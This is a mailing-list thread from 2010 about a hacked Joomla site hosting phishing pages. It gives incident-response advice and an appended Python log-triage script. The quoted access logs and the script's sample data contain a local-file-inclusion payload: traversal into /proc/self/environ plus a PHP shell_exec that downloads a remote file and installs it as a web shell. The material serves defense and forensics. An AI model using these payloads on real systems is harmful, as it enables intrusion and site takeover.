[thelist] block phishing

John List johnlist at gulfbridge.net
Sun Mar 28 14:18:20 CDT 2010

On 03/28/2010 12:20 PM, Bob Meetin wrote:
> I got a notice that one of my sites got hit yesterday, so I logged in, 
> and identified the file mentioned, also found a couple php files that 
> got dropped into webhome that were related. I moved the files into an 
> out of webroot folder for future scrutinization, then checked the 
> server access log, found a number of entries at the approximate date 
> stamp of the uploaded files that seemed to be related.
> I am methodically going through the system looking for anything not 
> locked down. What I could use some help with is understanding if the 
> access log entries are associated and how to lock out the intruders. 
> As IP addresses change I suspect it's more than simply editing the 
> robots.txt or adding a line in the .htaccess.


I'm a long time subscriber to this list but don't read all the posts so 
pardon me if I'm missing some context here. My impression is this:


      You say you "got a notice" that one of your sites has been "hit"
      and you have identified the "file mentioned". From that and your
      post's subject I infer that you mean that someone notified you
      that your site is hosting a phishing exploit.


      Your reaction so far is to look at the web log and consider
      tweaking your web configuration.

My reaction is that you are taking this far too lightly. The fact that 
someone else has, without your knowledge, placed files on your system 
indicates that your system had a vulnerability and is now compromised.

You should therefore take your system off line and rebuild it from 
scratch using backups.

To prevent such an exploit on your rebuilt system, you should do some 
forensics on the current system's disk before wiping it to determine how 
someone gained access. (Hint: The compromise occurred before the post of 
/fat.php but it has nothing to do with baidu.com or its spider.)

I am not familiar with Joomla's vulnerabilities, but if you suspect the 
intruder came via the web, then I'd recommend you do an inquiry on a 
Joomla list. Otherwise, you shouldn't rule out an intrusion thru ftp or 
ssh. So you need to check all your logs, not just your web log. (But a 
sophisticated attack will cover its tracks by altering the logs so you 
may never know.)

But even if you determine how they did this, you don't know how much 
damage they did. That's why it's important to rebuild your system.

Good luck,


> Some of the suspicious entries look like:
> - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 
> 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
> - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 
> 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; 
> Windows NT 6.0; en-US; rv: Gecko/20090729 Firefox/3.5.2 (.NET 
> CLR 3.5.30729)"
> fat.php was one of the deposited files. 18:58 was the datestamp.
> - - [27/Mar/2010:22:25:47 -0500] "GET 
> /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
> Related? There is nothing (current) in the filesystem called host.php
> - - [27/Mar/2010:22:25:41 -0500] "GET 
> /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F 
> HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download 
> http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt 
> print_out.php');?>"
> com_sectionex is a Joomla component. There is also no legitimate file 
> called print_out.php but which I found.
> - - [27/Mar/2010:22:25:48 -0500] "GET 
> /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
> Suggestions for robots.txt:
> #Baiduspider
> User-agent: Baiduspider
> Disallow: /
> #Others
> User-agent: *
> Disallow: /
> Suggestions for .htaccess:
> <Files *.*>
> order allow,deny
> allow from all
> deny from 220.181.
> </Files>
> -Bob

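Added here as an illustration, not code from either post: a small Python triage script that parses Apache combined-log entries like the ones Bob quoted, flags the indicators John's hint points at (the traversal into /proc/self/environ with PHP smuggled in the User-Agent, not the Baidu spider), and reports the earliest request for each dropped file name so it can be matched against file timestamps. The sample lines are constructed, with the client IP and hostnames replaced by placeholder values.

```python
import re
from urllib.parse import unquote

# Constructed sample lines mirroring the thread's entries; client IP is a
# TEST-NET address and hostnames are .invalid placeholders, not real data.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.0.113.9 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 200 8015 "http://www.example.invalid/fat.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Gecko/20090729 Firefox/3.5.2"
203.0.113.9 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex&controller=../../../../proc/self/environ%00%0F HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download http://attacker.invalid/tv.txt;mv tv.txt print_out.php');?>"
203.0.113.9 - - [27/Mar/2010:22:25:47 -0500] "GET /administrator/host.php HTTP/1.0" 200 73956 "-" "\\"Mozilla/4.0"
"""

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

# Traversal into /proc/self/environ, a null byte truncating the include path,
# and PHP tags in the User-Agent (which /proc/self/environ reflects back).
INDICATORS = {
    "path_traversal": lambda e: "../" in unquote(e["path"]),
    "proc_self_environ": lambda e: "/proc/self/environ" in unquote(e["path"]),
    "null_byte": lambda e: "%00" in e["path"].lower(),
    "php_in_user_agent": lambda e: "<?" in e["ua"] and "?>" in e["ua"],
}

def flag(entry):
    return [name for name, test in INDICATORS.items() if test(entry)]

def scan(log_text):
    """(time, path, indicators) for every parsable line that trips an indicator."""
    return [(e["time"], e["path"], found)
            for e in filter(None, map(parse_line, log_text.splitlines()))
            if (found := flag(e))]

def first_seen(log_text, dropped_files):
    """Earliest request for each dropped file name, to correlate with file mtimes."""
    seen = {}
    for e in filter(None, map(parse_line, log_text.splitlines())):
        name = unquote(e["path"]).split("?", 1)[0].rsplit("/", 1)[-1]
        if name in dropped_files and name not in seen:
            seen[name] = e["time"]
    return seen
```

Run against a real access log, the same scan shows the Baidu crawl is never flagged while the com_sectionex request trips every indicator; feeding first_seen the names of the dropped files gives the timestamps to compare with the files' mtimes.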